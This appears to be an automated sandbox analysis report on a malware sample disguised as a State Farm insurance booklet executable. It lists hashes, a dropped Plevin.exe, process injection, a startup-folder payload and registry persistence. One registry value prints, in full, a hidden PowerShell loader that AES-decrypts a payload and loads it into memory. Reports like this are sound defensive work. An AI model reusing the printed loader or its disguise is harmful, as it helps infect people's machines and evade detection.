Analysis
-
max time kernel
114s -
max time network
43s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
10-06-2022 17:29
Static task
static1
Behavioral task
behavioral1
Sample
State-Farm-Auto-Insurance-Policy-Booklet.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
State-Farm-Auto-Insurance-Policy-Booklet.exe
Resource
win10v2004-20220414-en
General
-
Target
State-Farm-Auto-Insurance-Policy-Booklet.exe
-
Size
266.0MB
-
MD5
3a015f8d7013c0fef3322e08cd41b565
-
SHA1
b4d03c21ff99aceb0023ec581e953b17ad541580
-
SHA256
29014a3438c174c2e7377168adf62080e7566e1664c1b639e454a9ad961b5fde
-
SHA512
f97e2b80eb0b00351c406df2a455d3dfe214925aada81455c5d40924a613ef883119a365978b50882a35fb27635c5937af0da7a8a5f91074eefa6eaba10518bf
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
Plevin.exepid process 1616 Plevin.exe -
Drops startup file 1 IoCs
Processes:
State-Farm-Auto-Insurance-Policy-Booklet.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SXuGZcKhlvoTHGcRbriizwmgfiNLw.zZAHomszxsi State-Farm-Auto-Insurance-Policy-Booklet.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 7 IoCs
Processes:
State-Farm-Auto-Insurance-Policy-Booklet.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\yvlobsgsdlyfg\shell\open\command State-Farm-Auto-Insurance-Policy-Booklet.exe Key created \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\yvlobsgsdlyfg State-Farm-Auto-Insurance-Policy-Booklet.exe Key created \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\yvlobsgsdlyfg\shell State-Farm-Auto-Insurance-Policy-Booklet.exe Key created \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\yvlobsgsdlyfg\shell\open State-Farm-Auto-Insurance-Policy-Booklet.exe Set value (str) \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\yvlobsgsdlyfg\shell\open\command\ = "powershell -windowstyle hidden -command \"$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$AC.Key=[Convert]::FromBase64String('SjQDQJXpF0XycaMaRqevDN2rb/N/xhU/qpHAQAoW3lk=');$EB=[Convert]::FromBase64String([IO.File]::ReadAllText([System.Text.Encoding]::Utf8.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcQWRtaW5cQXBwRGF0YVxSb2FtaW5nXE1pY3Jvc29mdFxXaW5kb3dzXFN0YXJ0IE1lbnVcUHJvZ3JhbXNcU3RhcnR1cFxTWHVHWmNLaGx2b1RIR2NSYnJpaXp3bWdmaU5Mdy56WkFIb21zenhzaQ=='))));$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);$AC.Dispose();[Reflection.Assembly]::Load($UB);[Q3L_Glan_Vtc1CPJQkQ70yXjuL3TzE3TZiJsfOSs5gAmyjm5oU53X8JV6OwMDTyztRqYI6.sw9snxC2eLnjjajXWtqtVxBDr52u5]::QfDGsg3D06Lqj7gwQVoPIisR72G4p2enJJGE9();\"" State-Farm-Auto-Insurance-Policy-Booklet.exe Key created \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\.zzahomszxsi State-Farm-Auto-Insurance-Policy-Booklet.exe Set value (str) \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\.zzahomszxsi\ = "yvlobsgsdlyfg" State-Farm-Auto-Insurance-Policy-Booklet.exe -
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
State-Farm-Auto-Insurance-Policy-Booklet.exedescription pid process target process PID 2016 wrote to memory of 1616 2016 State-Farm-Auto-Insurance-Policy-Booklet.exe Plevin.exe PID 2016 wrote to memory of 1616 2016 State-Farm-Auto-Insurance-Policy-Booklet.exe Plevin.exe PID 2016 wrote to memory of 1616 2016 State-Farm-Auto-Insurance-Policy-Booklet.exe Plevin.exe PID 2016 wrote to memory of 1616 2016 State-Farm-Auto-Insurance-Policy-Booklet.exe Plevin.exe PID 2016 wrote to memory of 1360 2016 State-Farm-Auto-Insurance-Policy-Booklet.exe State-Farm-Auto-Insurance-Policy-Booklet.exe PID 2016 wrote to memory of 1360 2016 State-Farm-Auto-Insurance-Policy-Booklet.exe State-Farm-Auto-Insurance-Policy-Booklet.exe PID 2016 wrote to memory of 1360 2016 State-Farm-Auto-Insurance-Policy-Booklet.exe State-Farm-Auto-Insurance-Policy-Booklet.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe"C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Users\Admin\AppData\Local\Temp\Plevin.exe"C:\Users\Admin\AppData\Local\Temp\Plevin.exe"2⤵
- Executes dropped EXE
PID:1616 -
C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe"C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe" /s2⤵
- Drops startup file
- Modifies registry class
PID:1360
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
997KB
MD5dbc534854dd385e59a3f1906ddfb9020
SHA12b3062d82232ce10a8713829199769ff0d12e0fc
SHA25606486febb76aaa7bf469ba1bf46a92c4eafc42a5626646184e8865c862d09dd0
SHA5121506fbc8fca0a3ca06e24fdae2fb9e8cb345fd6197f5cbbaa990490cc20a25b72906ab9668725f29c0bfce6528bd7dca5dc15ca0ac3c0327d1876e58e3d47951